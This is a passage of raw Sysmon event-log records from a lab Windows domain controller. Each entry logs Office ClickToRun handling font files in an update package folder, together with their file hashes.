23542300x800000000000000070674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\INFROMAN.TTFMD5=759E59B34646E12AC98AE13E4077D267,SHA256=EE066D11D2933638A5D00C242A24F2C9B8BD68BD3DDB3B334123F8EFCD539F03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\IMPRISHA.TTFMD5=B27D4AD5FD7F7C5044C7CBBF2DAD758D,SHA256=9DB1F3315D5C18572381F3880BD2C171FA1F49A1CD6E5F5F8D97CC1317911F06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\HTOWERTI.TTFMD5=4E123DC335F4C41671E597D37EDCAFFD,SHA256=8F7699A0FD02DE79D565FBD5205BE070B777B790F028C1FD7E6090E34ED81BDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\HTOWERT.TTFMD5=9E23421978544D8E00A00EB47740D280,SHA256=D5ED7DBD872AE77E6E30CADA5287DBAA1BA755F962D0672C5ED14BEA08F08422,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\HATTEN.TTFMD5=FB00DE748EFC6A476F3CC7B87A582AC9,SHA256=40E898E471FA4DE3CA09A6DFED961D00D6395AF20FE6CF1C6B83C795BEA04543,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\HARNGTON.TTFMD5=DA5337433104660E9E064EFA431E20C7,SHA256=F482F5760773767D798C64F470C08C140588E7B07510094497E7A89C3F2F319D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\HARLOWSI.TTFMD5=A59B318FFAB16DB77922CBE4762FC1AA,SHA256=A9488A827468A58C7BA78ABC284A949A27F7EF4BCB921674B354D926D1C216C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOUDYSTO.TTFMD5=A72A7FBCAA9A8D77295E466C12C1F749,SHA256=AB475061E2479350A315BF3F72D65AE9ACC37BEBEF4CF8DF979F8F6CED659216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOUDOSI.TTFMD5=832E3CFB4368F895AC5805CB9FFF7898,SHA256=71D2D85781689DE6326A229AEBA2D143A5B3E8A4F0FC93B75AF197FB63BF05BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOUDOSB.TTFMD5=856DD110B08628F38F8FCFAFE6FAB19C,SHA256=F3CD0E13E4A0ED77522B1AB29061DA6658F449D1D89B56751CDCDEED86DA47E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOUDOS.TTFMD5=78D7BDC55148AAA3307A1E8AD735C40F,SHA256=380E2CD97160E14042CEA52FF785CA92D966E29F873CF2B93E1746F3A582EC74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOTHICI.TTFMD5=89D1D828DD7407E8E5FF6AA83CC5B294,SHA256=6CF57BE6F9D0BD60BD5DC6EEE7C11E87E5B19DF210156495A524B974185B9FB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOTHICBI.TTFMD5=ABD76D61050C97AB0E7BF2DB2D9BD5AD,SHA256=2DC5949D57D2E172601FB6F5093C1FBF15A463E29ED47C4C8FF2434BAF1C2B19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOTHICB.TTFMD5=BC420C1C2B98E2EE8B2A75C1CE1FE083,SHA256=90CB613B492874A560C0FF18A3402B1D24FB7E846DFF11295D5C4644D6C75E83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GOTHIC.TTFMD5=CFCE6ABBBFF0099B15691345D8B94DCC,SHA256=3A9CBB5D75B2A2B0D22DC94571608E4E9DC7B88E825374985880C5722C1C9E5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GLSNECB.TTFMD5=3507752E156A0AD7C77146F096DB0D0E,SHA256=F44727CFDEF37B028EA00283FEE7FFA09B821CE2BBBFA28D518EC48976468EA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GLECB.TTFMD5=141449D91EA53B0C3F08600F47ECBC0C,SHA256=962EBE317BFBA70511C4F04CEB3A7160DEF7E3CE8CFCB035FDDCE7EF202FF9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GIL_____.TTFMD5=D084E51196D50DD6735FF8A6E4D6F4F2,SHA256=F6664B244192AB4CF3A58BB6A653700D1F345D03BB8879888BCEA1B6F8F3F97C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GILSANUB.TTFMD5=860AFE3ED9DDFA8E430E7AFF2865A2B7,SHA256=A74B5E4489BB98A96FF5F727BF33DD922703D0F3069F4CE95AA2C5D7F92D2253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GILLUBCD.TTFMD5=A4AF6D9424CB97897352E04516A9AB99,SHA256=9C96A89A866BCC0B36D1D80F61EBB6BA9251CF9708E0060AC94546BE57DBD881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GILI____.TTFMD5=FA19359635D5FC6FC94E29F23AE9341D,SHA256=5B81F2B18D3B19BAA4CF151CD6EB6C49F8E0E58194FD0A02995CCCDEC803448E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GILC____.TTFMD5=A33D986E9D883DC5B903033CEE84C0B9,SHA256=3216F7D3A15D3107A457B93B5537784108C3237B3FB2D16494D8ECEE0A22CBD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GILB____.TTFMD5=3F3B5DEE5276F99B6D5BFCF7E1A7BE52,SHA256=C95E47D509EADA17F78D730010A5BBB69F60A940C17DF6E4E7354C62262C1AB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GILBI___.TTFMD5=E5601D483DF85E0727075984CDDD19F1,SHA256=E79F9C1768515A1844BD889092ECEBF5C40F301E4415AD1238A8E2F09CE8543E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GIGI.TTFMD5=50F152370EEE4AF8CD18B55D29F975AD,SHA256=CF70B1CF7B70913C7F2288F037FE376E159D9E35F0619A2B412E88D7F3F5CE3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GARAIT.TTFMD5=338C35B0D38148DB47B4C5D7E056ACB1,SHA256=9CDA64DABB9B2AEF5A810FE7ED231CA34C4CF42AE5A108C368AB6A21AF2C4CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GARABD.TTFMD5=2B046114861E21D12AEC68A98E5A7C29,SHA256=76487D4B739FFEA6D64F86D0E6A19A8D0031DC67BA2FA2518BBC1818351543FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GARA.TTFMD5=13BF8BED4897F08A18C3F708AB11E2FF,SHA256=6204F2ACE1A6C196B95B079F10DED04AF8F431CE8EB2CF3945ACC89B594C3728,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GADUGIB.TTFMD5=428896FA5B8CCCECED61F4092A19BED9,SHA256=9FB9EAC21906DB8724424DB4D3C651CAD342651F3CC5B2FB96FB99640A930031,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GADUGI.TTFMD5=ABC0BEF3FDD877ABE64AA81D035548A8,SHA256=927FB9474F1EEB09DEAEBF2BD1D2377ECA8C5FE6BBD15BC47EC9CFA92084D5C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\GABRIOLA.TTFMD5=9F6C62F1F041CA9F3D69AC76684314D0,SHA256=29EAA6D65D0F1508D2D550D5DDF4E7E3A4E23CF13B376FF93140A8A6115B2F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FTLTLT.TTFMD5=119860DC7345499955660C009993058E,SHA256=4FEEEAC17A284F6F45FC66BD28DA141E6BD904F291290C1214D25D06E7C542BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRSCRIPT.TTFMD5=C2F7638BE87032CD75A21EECEFFD56BD,SHA256=DDEDA8F737249E8A2AC17F3E0757525E20631375CBB8B78D99B1462A146CEF47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FREESCPT.TTFMD5=B6B6C03D8E793ABF717F01172B04F7E1,SHA256=2E131823861483B966F87CA23063BA6F3C0CECF9AC5D785D71ED1710DAB477D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.767{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRAMDCN.TTFMD5=C379B03BB3FEEB76B9E05ED70791B22F,SHA256=1861E0824E53CA60A04EA1BC7BDB159131448FEC711ED079EBCCBF645DD345D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRAHVIT.TTFMD5=7292545B182C1E188FBD3DB9C4DFB680,SHA256=AC70B60F163536B2C0E2E2752262A6F8D1DB6AF43DA73D5CAAB855D369F1DA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRAHV.TTFMD5=59E78317900DF124C3780E2334B0F77A,SHA256=D1A3A6E5937C5923D4138C1F622145F577AE2F97C7F2D0E899ECEC4D0412B839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRADMIT.TTFMD5=A8454800D02829DD275E52EC3F068227,SHA256=478E980ECFB423400516403CF49587F5B2E6A6DFC2C41CFFCC51C109ADC24EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRADMCN.TTFMD5=364D488301B62C1E63C04C545EB32315,SHA256=4AB0F4D87991CBDA91A625369E2804C4FB88969CDB1E4BD83B6BF37D07CF9CFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRADM.TTFMD5=082252176F1F4953CEA2A7E5E9F300F4,SHA256=CFD1BB2C9B0E8B624952288ACF9BDADAA64E52BC846E4720E2F0653359E5B8C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRABKIT.TTFMD5=5E4FEFF742753CABF0060596CB2A5D62,SHA256=2FC6FF3C5253DCA997C68D592E8CFA066B516A782D4B2747ACF297C6523F9306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FRABK.TTFMD5=E130D119682ECB567748343BF7F263B0,SHA256=9AD3D0E5EF31C4A9A98CB0E169E4E625286AA34C712ADD3E001C0100138730D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FORTE.TTFMD5=60A6C051C1563A067DD7166123A58698,SHA256=7407F0814D04A4CC45127933DF1D6FFAB5C90E5E888D33A7279CD82C36426B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Fonts\private\FELIXTI.TTFMD5=0016F77F50D636D6EB6336A8A9D5D3D5,SHA256=662AC854D07237D7D6A2E1C0EFBA28C6166002AE8CBE0DF0F58C43F65B21C54D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:39.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 